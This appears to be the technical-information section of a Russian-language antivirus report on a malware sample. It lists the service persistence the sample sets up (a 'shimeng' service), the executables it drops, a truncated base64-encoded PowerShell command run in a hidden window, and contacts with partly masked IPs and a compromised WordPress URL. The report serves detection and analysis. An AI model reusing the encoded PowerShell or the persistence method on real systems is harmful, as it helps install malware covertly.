Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\shimeng] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\shimeng] 'ImagePath' = '"%WINDIR%\SysWOW64\mfcm120u\shimeng.exe"'
- 'shimeng' "%WINDIR%\SysWOW64\mfcm120u\shimeng.exe"
- 'shimeng' %WINDIR%\SysWOW64\mfcm120u\shimeng.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMARQB0AC0ASQB0AEUAbQAgAHYAQQBSAEkAYQBCAEwAZQA6AFQAcwB2ADMATQBlACAAIAAoACAAIABbAHQAeQBQAGUAXQAoACcAcwB5AHMAVABlAE0ALgBpACcAKwAnAE8AJwArACcALgAnACsAJwBEACcAKwAnAGkAcg...
- %HOMEPATH%\lahflk6\rej2lxc\iwdm7t.exe
- %WINDIR%\syswow64\mfcm120u\shimeng.exe
- %HOMEPATH%\lahflk6\rej2lxc\iwdm7t.exe в %WINDIR%\syswow64\mfcm120u\shimeng.exe
- '17#.#8.199.157':80
- '59.##8.253.194':8080
- http://in#####relectronica.com/wp-admin/M/
- http://59.###.253.194:8080/QBu1K0CA0DI4S/EABA9fIyxaTvhiExglB/ via 59.##8.253.194
- DNS ASK in#####relectronica.com
- '%HOMEPATH%\lahflk6\rej2lxc\iwdm7t.exe'
- '%WINDIR%\syswow64\mfcm120u\shimeng.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMARQB0AC0ASQB0AEUAbQAgAHYAQQBSAEkAYQBCAEwAZQA6AFQAcwB2ADMATQBlACAAIAAoACAAIABbAHQAeQBQAGUAXQAoACcAcwB5AHMAVABlAE0ALgBpACcAKwAnAE8AJwArACcALgAnACsAJwBEACcAKwAnAGkAcg...' (со скрытым окном)